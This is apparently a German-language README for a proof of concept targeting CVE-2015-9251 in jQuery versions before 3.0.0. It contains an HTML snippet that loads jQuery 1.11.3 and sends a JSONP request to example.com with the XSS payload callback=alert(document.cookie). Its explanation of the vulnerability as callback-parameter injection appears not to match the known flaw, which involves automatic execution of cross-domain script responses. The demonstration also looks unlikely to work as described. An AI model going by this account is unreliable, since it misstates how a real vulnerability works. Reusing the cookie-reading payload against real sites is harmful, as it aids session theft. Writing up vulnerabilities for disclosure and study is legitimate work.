
PoC für CVE-2015-9251 jQuery kleiner als 3.0.0.
PoC für CVE-2015-9251 jQuery älter als 3.0.0.
Dieses Repository enthält einen Proof of Concept (PoC) für die Schwachstelle CVE-2015-9251 in der Bibliothek jQuery. Die Schwachstelle ermöglicht einen Cross-Site-Scripting-Angriff (XSS) über unsanitisierte JSONP-Aufrufe, da jQuery das Einschleusen von Code in den callback-Parameter in Versionen vor 3.0.0 erlaubt.
CVE-2015-9251 betrifft jQuery-Versionen vor 3.0.0. Die Schwachstelle wird durch Manipulation des callback-Parameters in einer JSONP-Anfrage ausgenutzt, was die Ausführung beliebigen JavaScript-Codes im Browser des Opfers ermöglichen kann. Dies kann zur Offenlegung sensibler Daten wie Sitzungscookies führen.
Führen Sie die folgenden Schritte aus, um den PoC auszuführen:
<script src="https://code.jquery.com/jquery-1.11.3.min.js"></script>
<script>
// Funktion, die eine Anfrage an einen anfälligen Server simuliert
$.ajax({
url: "https://example.com/api?callback=alert(document.cookie)",
dataType: "jsonp", // JSONP erlaubt Codeausführung in JSONP-Callbacks
success: function(response) {
console.log(response);
}
});
</script>